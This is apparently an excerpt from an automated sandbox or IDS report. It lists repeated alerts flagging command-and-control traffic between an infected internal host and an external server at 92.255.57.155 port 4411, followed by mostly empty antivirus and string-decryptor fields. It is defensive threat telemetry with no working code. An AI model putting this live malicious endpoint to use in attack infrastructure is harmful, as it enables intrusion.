2024-12-29T09:51:03.996284+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:04.504595+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:04.715168+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:04.796051+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:04.925368+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.125989+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.182844+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.336382+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.572643+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.781289+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.905298+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:06.270171+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:06.480651+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:06.693300+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:29.367466+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:38.955890+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-29T09:49:16.610128+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:49:30.466737+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:49:44.404637+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:49:58.406885+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:03.047504+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.245200+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.364800+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.484146+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.667286+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.786671+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.950315+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:05.714918+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:05.913851+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:06.060632+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:07.000734+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:07.120152+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:07.379532+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:07.540764+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:07.660213+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:08.473940+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:08.913204+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:09.043552+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:09.163558+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:10.085689+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:10.944601+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:11.597885+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:11.760592+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:12.783218+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:12.879169+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:13.092410+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:13.215338+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:13.347191+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:13.508742+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:13.630052+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:14.664090+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:14.817332+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:14.980694+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:15.106876+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:15.228324+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:16.796283+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:16.856975+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:17.195385+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:17.476686+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:17.639428+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:18.599894+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:18.814311+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:18.933617+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:19.292357+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:20.837412+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:21.076005+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:21.539311+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:21.656884+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:22.416426+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.153286+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.321307+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.440756+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.560131+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.679769+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.801288+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:24.829139+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:24.948706+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:25.454744+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:25.525094+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:25.765302+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:26.616898+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:26.815774+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:27.054545+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:27.432692+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:27.733196+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:27.993193+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:28.915978+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:29.175217+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:29.266101+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:29.336681+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:29.567348+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:30.269550+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:30.944889+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:31.173180+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:31.388108+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:31.507470+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:31.635975+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:32.361841+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:34.039288+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:34.737075+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:34.910964+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:35.030635+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:36.403723+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:37.054426+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:37.269208+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:37.388514+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:37.788142+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:38.081916+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:38.881240+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:39.125210+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:39.245347+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:39.365182+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:39.485076+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:39.604568+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:40.586807+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:40.799214+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:40.918759+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:41.421216+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:41.632142+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:42.725987+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:43.124721+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:43.309216+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:43.457218+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:43.624505+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:44.267988+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:44.955130+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:45.946339+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:46.243164+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:47.070658+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:47.192304+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:47.401428+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:47.488304+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:48.163875+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:48.840868+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:49.004491+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:49.124073+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:49.337934+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:49.576067+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:51.362069+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:51.648618+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:51.988006+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:53.731329+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:54.820056+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:55.058821+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:55.275245+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:55.527332+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:55.700544+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:55.903636+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:56.741940+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:56.925894+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:57.072634+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:57.235446+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:57.298726+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:58.684333+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:00.101454+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:00.435977+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:00.731439+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:01.053669+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:01.223506+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:01.462274+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:01.852300+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:02.466846+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:02.644798+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:03.038662+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:03.666431+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:03.876501+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:04.159384+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:04.796099+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:04.868680+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:05.147864+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:05.271370+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:05.451332+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:05.575348+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:06.024480+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-29T09:49:29.301964+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-29T09:50:09.622287+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
